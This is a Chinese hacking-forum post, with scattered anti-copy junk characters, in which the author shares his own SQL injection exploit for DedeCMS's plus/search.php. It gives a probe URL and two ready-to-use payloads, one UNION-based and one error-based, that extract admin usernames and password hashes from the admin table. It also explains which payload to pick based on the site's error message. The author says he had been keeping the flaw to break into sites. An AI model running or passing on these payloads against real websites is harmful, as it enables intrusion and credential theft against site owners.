转载不加作者名的没JJ% `6 _, y" V1 l3 i6 Z* W
" o2 d+ s+ Z8 H
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。" z/ J4 }) b: T+ L5 G+ u
0 N9 E& \ O8 l# F* D$ ]8 O既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
- O% k1 W$ O0 E$ K: Z$ M" K
3 W, \7 Q# X# h: t3 l6 J3 f/ B我一般是这样测试的:
. z+ w) F! K0 G) x7 ]+ k7 }* \" b8 P% A) X8 y
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a& B3 |. x) M8 W$ o3 U1 I* W
% ]& A$ ?- \9 T! A" }转载不加作者名的没JJ2 x( E6 \3 L# z& O+ y
: } }4 G2 M; W# k ?/ d% b o5 _# w
作者:鬼哥
! ?" k8 N1 y& r1 z" U, c/ ]* D1 ]- d& {) Z! @
: Q ?4 U( `6 u; N# W
. g# O( s; { C9 J
看结果如果提示( Q, H, d) Y q, q0 e1 r
p! y0 g8 b% g6 G; vSafe Alert: Request Error step 2 ! c- G) ]8 c9 M1 v, `: M: K6 |
) J* s* K7 n, V9 Z6 p( t
那么直接用下面的exp
! ]" t% X: G1 g) i6 U0 T
* \0 X b- t- pxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
8 ]8 Y" p0 o% B9 h3 Y1 s, D- J9 K2 q7 }0 o
7 p; v1 J8 {5 C# k `
看结果如果提示
4 ~; G# i5 K. Q# [' m' u! S1 Q
( }- _# F7 j: S1 P, LSafe Alert: Request Error step 1 !+ H# _ C# R& V# N i
/ `9 ?" s' z0 n+ P
那么直接用下面的exp
7 E/ E9 W5 O: k9 M4 I+ q3 u, U( H8 i% a! D7 b9 |- o
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
- n9 ?1 z5 t; k% K: b- ^
, `8 d4 C8 b( w# p( n7 d2 [7 u1 ^. V6 V$ U l" h2 @9 }/ K& H; q* t
如果正常显示证明漏洞不存在了。
5 \( @6 e( }1 l; H1 }0 E$ V" X$ y9 K; U7 z9 i
转载不加作者名的没JJ |